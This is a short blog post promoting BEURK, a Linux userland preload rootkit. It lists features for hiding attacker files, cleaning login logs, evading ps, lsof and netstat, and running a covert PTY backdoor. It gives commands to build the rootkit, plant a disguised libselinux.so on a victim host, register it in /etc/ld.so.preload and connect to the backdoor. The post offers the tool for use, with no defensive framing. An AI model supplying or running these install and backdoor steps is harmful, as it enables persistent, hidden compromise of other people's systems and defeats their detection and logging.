Advertisements

BEURK – Experimental Unix RootKit

BEURK is a userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

Features:

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Usage:

  • Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
  • Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
  • Run
./client.py victim_ip:port # connect with furtive backdoor

Advertisements

Leave a Reply

Your email address will not be published. Required fields are marked *

Advertisements
Advertisements
Advertisements
Advertisements
%d bloggers like this: